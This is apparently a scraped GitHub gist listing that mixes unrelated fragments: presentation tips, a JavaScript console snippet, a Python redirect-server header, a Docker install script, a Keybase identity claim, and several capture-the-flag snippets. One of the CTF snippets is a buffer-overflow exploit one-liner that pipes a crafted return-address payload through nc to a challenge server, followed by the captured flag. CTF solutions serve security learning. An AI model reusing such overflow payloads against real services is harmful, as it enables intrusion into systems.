- Story
- Practical
- Experienced
- Enthusiastic
- Demo
Not required for a good talk, but the best talks have them. Small ones to punctuate a point, larger ones to have an audience on the edge of their seat. Learn, then practice, the art of storytelling and it will immediately improve your presentation.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
document.querySelectorAll('.react-select__multi-value__label.css-blah-blah-blah').forEach(element => console.log(element.textContent)); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
""" | |
Simple HTTP URL redirector | |
Shreyas Cholia 10/01/2015 | |
usage: redirect.py [-h] [--port PORT] [--ip IP] redirect_url | |
HTTP redirect server | |
positional arguments: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
apt update -y | |
DEBIAN_FRONTEND=noninteractive apt install apt-transport-https ca-certificates curl software-properties-common -y | |
curl -fsSL "https://download.docker.com/linux/ubuntu/gpg" | apt-key add - | |
add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu" | |
add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu bionic stable" | |
apt update -y | |
DEBIAN_FRONTEND=noninteractive apt install docker-ce -y | |
curl -L "https://github.com/docker/compose/releases/download/1.21.2/docker-compose-Linux-x86_64" -o /usr/local/bin/docker-compose | |
chmod +x "/usr/local/bin/docker-compose" |
I hereby claim:
- I am choko08 on github.
- I am choko08 (https://keybase.io/choko08) on keybase.
- I have a public key ASD1eB8HX4GVhgNoSNlBaijfmnCk_nbIRFbay91L4n2G5Qo
To claim this, I am signing this object:
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# \xa0\x89\x04\x08 <get_flag>: | |
# \x4f\xd6\x8c\x30 # 1st cmp | |
# \xd1\x19\x57\x19 # 2nd cmp | |
python -c 'print "A" * 56 + "\xa0\x89\x04\x08" + "ret" + "\x4f\xd6\x8c\x30" + "\xd1\x19\x57\x19"' | nc 54.175.35.248 8005 | |
Qual a palavrinha magica? 3DS{b0f_pr4_c0m3c4r_n3} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
""" | |
different_and_notorious_alignment | |
[PT-BR] | |
Acesse o servidor em 54.175.35.248:8001 | |
""" | |
#coding:utf-8 | |
import socket | |
def countDiff(x,y): |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
""" | |
Results does not matter!!! | |
[EN] | |
Santa got a paper with strange stuff on it. | |
There was a hint on the bottom: "Use 32 bit" | |
He have no idea what's this about. | |
Can you help him to reveal the flag? | |
Flag format: 3DS{sha256(FLAG)} | |
[PT-BR] |